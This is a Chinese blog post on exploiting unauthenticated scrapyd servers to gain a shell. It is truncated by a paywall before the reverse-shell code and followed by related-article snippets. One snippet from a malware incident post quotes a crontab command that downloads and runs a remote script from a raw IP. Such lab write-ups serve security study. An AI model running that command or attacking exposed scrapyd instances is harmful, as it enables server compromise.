scrapyd 未授权访问漏洞getshell

于 2022-05-27 22:40:09 发布
阅读量583 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ST________/article/details/125012137
版权
本文介绍了scrapyd的未授权访问漏洞,该漏洞可能导致攻击者部署恶意代码到服务器,获取服务器权限。漏洞复现过程包括访问特定端口、创建恶意scrapy项目并加入反弹shell代码,最后通过scrapyd-client部署恶意egg包,成功反弹shell。
摘要由CSDN通过智能技术生成

scrapyd 未授权访问漏洞getshell

简介

scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。

参考链接:https://www.leavesongs.com/PENETRATION/attack-scrapy.html

漏洞复现

访问http://192.168.1.182:6800/,漏洞存在
在这里插入图片描述
本地安装scrapy框架,并创建一个scrapy项目:

pip install scrapy
scrapy startproject evil

在这里插入图片描述

生成了项目后,cd evil并编辑vim evil/init.py文件

最低0.47元/天 解锁文章
Ne2o1
关注
web渗透测试漏洞复现:nacos授权访问漏洞复现并getshell
HACKONE的博客
03-30 910
nacos授权访问
vulhub漏洞复现61_ scrapyd
weixin_44193247的博客
02-12 658
vulhub漏洞复现练习篇
【vulfocus漏洞复现】scrapyd 授权访问漏洞
一剑开天门!的博客
03-14 7134
【vulfocus漏洞复现】scrapyd 授权访问漏洞
scrapyd 授权访问漏洞
EC_Carrot的博客
07-27 689
漏洞简介 scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。 参考文章:https://www.leavesongs.com/PENETRATION/attack-scrapy.html 漏洞复现 构造一个恶意的scrapy包,构造前需要安装scrapyscrapyd-client: pip install scrapy pip install scrapyd-clie
scrapyd 部署项目说被被拒绝访问
de20050138的博客
09-19 336
修改访问地址为0.0.0.0 后就可以部署成功 Python目录下\Python36\Lib\site-packages\scrapyd的default_scrapyd.conf 解决方法的来源
scrapyd部署的巨坑
andytopxu的专栏
04-06 794
scrapy项目在使用scrapyd部署的时候,如果某个*.py里使用了相对路径的文件。 例如:self.fontB=TTFont(self.FILE_PATH+"******.**f") 使用部署指令:scrapyd-deploy **P -p **** 后,就会报下面的错误!! 这个一个天坑,整了一天,网上资料尽是如何常规部署,这个资料很难很难查到。 下面两则文章救了我。 h...
时隔五年,Scrapyd 终于原生支持 basic auth
Python中文社区
06-20 458
文/鑫爷 图片来源于网络Issue in 2014Pull request in 2019https://github.com/scrapy/scrapyd/pull/...
利用文件包含漏洞-getshell
LJH1999ZN的博客
02-22 7488
一、什么是文件包含漏洞 文件包含是指应用程序没有对引用的文件做合理的校验,导致包含的文件中含有恶意的代码,并且执行了该代码。从而产生了文件包含漏洞 二、文件包含漏洞的利用条件 1.引用一个任意类型的文件 2.程序读取文件并且执行 三、将木马程序放入某个本地文件中。 1.利用网站报错日志写入木马程序 2.利用文件上传功能,上传含有木马的任意文件 四、文件包含getshell 1.本地文件包含getshell 网站会将一些错误信息记录到日志文件中,我们可以利用这个特性将木马写入日志文件中去
Hadoop YARN ResourceManager 授权访问getshell
09-23
利用Hadoop YARN ResourceManager 授权访问getshell工具以及WORD说明
seeyonAjaxGetshell:致远OA seeyon授权漏洞批量getshell
05-28
致远OAseeyon授权漏洞+文件上传批量getshell 抄借鉴tools论坛大佬的payload写了个批量拿shell的脚本。 Note: 为了方便(懒比)直接调用curl,因此请在Linux下运行。 ip.txt --> 待检测IP shell.txt --> shell...
Apache-flink 授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 授权访问任意jar包上传反弹shell
getshell之Apache Flink 授权访问+远程代码执行
MoCoCN的博客
11-12 857
@[MoCo](getshell之Apache Flink 授权访问+远程代码执行) 0x00前言 又是领导不在的一天,今天兄弟们就是天,随着工作的时间越来越久对知识的渴望也越来越强大,最近几天在看反弹shell的一些文章,也学习到了一些反弹shell技巧和姿势,由于环境的问题,暂不能记录文本,虽说都是一些基本的吧,慢慢来嘛,看着文章,吐槽的国内某知名的培训机构,努力的汲取知识,看着看着就累了,有点看不动了,但是还是想学,于是决定去看看adminxe大佬的博客上看看有没有发布新的文章,看见大佬昨天发布了一
ip地址
祈澈菇凉
11-07 512
1. 什么是地址 地址就是用来标记地点的 2. ip地址的作用 ip地址:用来在网络中标记一台电脑,比如192.168.1.1;在本地局域网上是唯一的。 3. ip地址的分类(了解) 每一个IP地址包括两部分:网络地址和主机地址 3.1 A类I
scrapyd用来方便控制scrapy爬虫
乾坤瞬间的博客
07-17 1926
使用scrapyd服务的方法与步骤 什么是scrapyd scrapyd = scrapy + deploying 把scrapy程序发布到上面的一套由python写好的服务 Scrapyd is an application for deploying and running Scrapy spiders. It enables you to deploy (upload) y...
python之Scrapyd部署爬虫项目(虚拟环境)
一吱大懒虫的博客
06-05 1515
1、新建虚拟环境(方便管理),在虚拟环境中安装scrapy项目需要使用到的包 进入虚拟环境使用pip将所需包安装完成 2、打开命令行工具执行pip install scrapyd 3、输入scrapyd启动scrapyd服务,在浏览器输入127.0.0.1:6800 即可查看是否成功启动服务 4、如果连接成功先关闭服务,自己在D盘下新建一个文件夹,名称自定义如:ScrapydP...
kdevtmpfsi 病毒感染及处理办法
weixin_39334709的博客
10-17 1645
发现病毒 今天在家里,写完爬虫部署到远程服务器上后,正想运行时,发现 ScrapydWeb 上多了一条奇怪的记录: 好家伙,项目名称居然就是 evil ,生怕我不知道这个是一只“邪恶”的爬虫吗? 仔细看这只邪恶的爬虫,发现有一条比较关键的信息,就是下面的 * * * * * wget -q -O - http://195.3.146.118/sc.sh | sh > /dev/null 2>&1 ,很明显,这是一条 crontab 语句。 在服务器的命令行里输入 crontab -l
安全RCE之授权访问分析
kali_Ma的博客
12-03 966
前言 安全研究员vakzz于4月7日在hackerone上提交了一个关于gitlab的RCE漏洞,在当时并没有提及是否需要登录gitlab进行授权利用,在10月25日该漏洞被国外安全公司通过日志分析发现授权的在野利用,并发现了新的利用方式。根据官方漏洞通告页面得知安全的版本为13.10.3、13.9.6 和 13.8.8。本篇将复现分析携带恶意文件的请求是如何通过gitlab传递到exiftool进行解析的 gitlab介绍 GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库
第50讲:Scrapy 部署不用愁,Scrapyd 的原理和使用
菜鸡小白的成长记录
01-19 5683
上节课我们的分布式爬虫部署完成并可以成功运行了,但是有个环节非常烦琐,那就是代码部署。 我们设想下面的几个场景: 如果采用上传文件的方式部署代码,我们首先需要将代码压缩,然后采用 SFTP 或 FTP 的方式将文件上传到服务器,之后再连接服务器将文件解压,每个服务器都需要这样配置。 如果采用 Git 同步的方式部署代码,我们可以先把代码 Push 到某个 Git 仓库里,然后再远程连接各台主机执行 Pull 操作,同步代码,每个服务器同样需要做一次操作。 如果代码突然有更新,那我们必须更新每个服
redis授权访问getshell
最新发布
03-16
Redis授权访问是指Redis服务器的访问控制没有设置好,导致攻击者可以通过Redis的一些命令获取服务器的敏感信息或者执行恶意代码,从而实现getshell的攻击。为了避免这种情况发生,我们需要对Redis服务器进行安全配置,包括设置密码、限制访问IP等措施。同时,也需要及时更新Redis的版本,以防止已知漏洞被攻击利用。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值